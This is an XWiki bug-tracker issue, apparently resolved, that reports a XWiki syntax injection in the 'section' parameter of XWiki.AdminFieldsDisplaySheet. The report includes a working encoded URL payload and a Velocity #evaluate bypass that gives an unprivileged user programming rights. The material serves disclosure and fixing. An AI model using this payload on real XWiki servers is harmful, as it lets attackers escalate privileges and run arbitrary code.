Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
1.5 M2
-
Unknown
-
N/A
-
N/A
-
Description
Steps to reproduce:
- Add
{{template name="admin.vm" output="false"/}} {{display reference="XWiki.AdminFieldsDisplaySheet"/}}
to any place where you can use wiki syntax like the "about" section in your user profile as a user without programming or script rights.
- Add the URL parameter section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D.
Expected results:
Some errors or nothing is displayed.
Actual result:
hello from groovy! followed by some raw HTML is displayed.
This shows that a user without script or programming rights can execute a Groovy macro and thus in principle gain programming rights. There is a caveat which is that the executed code is first converted to lowercase. While this means a lot of the API is not available there are workarounds like using
{{velocity}}#evaluate($request.exploit){{/velocity}}
as main exploit code and thus executing the content of a request parameter. A fully working set of parameters would be
section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%2Crequest.exploit%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request.exploit%29%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&exploit=Hello+from+Velocity%21+%24hasProgramming
which results in the output Hello from Velocity! true, thus showing that we have programming rights in Velocity and no more restrictions. Without escaping, the corresponding parameter values are
{{/html}} {{async async="true" cached="false" context="doc.reference,request.exploit"}}{{velocity}}#evaluate($request.exploit){{/velocity}}{{/async}}
for section and
Hello from Velocity! $hasProgramming
for exploit.
This exploit is possible because XWiki.AdminFieldsDisplaySheet outputs $section (and other variables) without further escaping, thus allowing XWiki syntax injection and admin.vm can be abused to set $section from the section request parameter.
Attachments
Issue Links
- is caused by
-
XE-14 Merge XWiki.WebHome page content & wiki administration
- Closed
- links to